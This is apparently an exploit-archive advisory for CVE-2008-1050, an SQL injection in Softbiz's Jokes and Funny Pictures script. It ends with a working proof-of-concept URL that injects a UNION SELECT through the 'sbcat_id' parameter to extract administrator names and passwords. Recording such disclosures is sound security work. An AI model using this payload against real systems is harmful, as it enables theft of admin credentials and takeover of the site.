Softbiz Jokes and Funny Pictures Script - 'sbcat_id' SQL Injection

Related Vulnerabilities: CVE-2008-1050  
Publish Date: 25 Feb 2008
Author: -=Mizo=-
                							

                source: http://www.securityfocus.com/bid/27973/info

The Jokes and Funny Pictures script from Softbiz is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com/index.php?sbcat_id=-1 union select 0,1,2,concat(sbadmin_name,0x3a,sbadmin_pwd),4,5,6,7,8,9 from sbjks_admin/*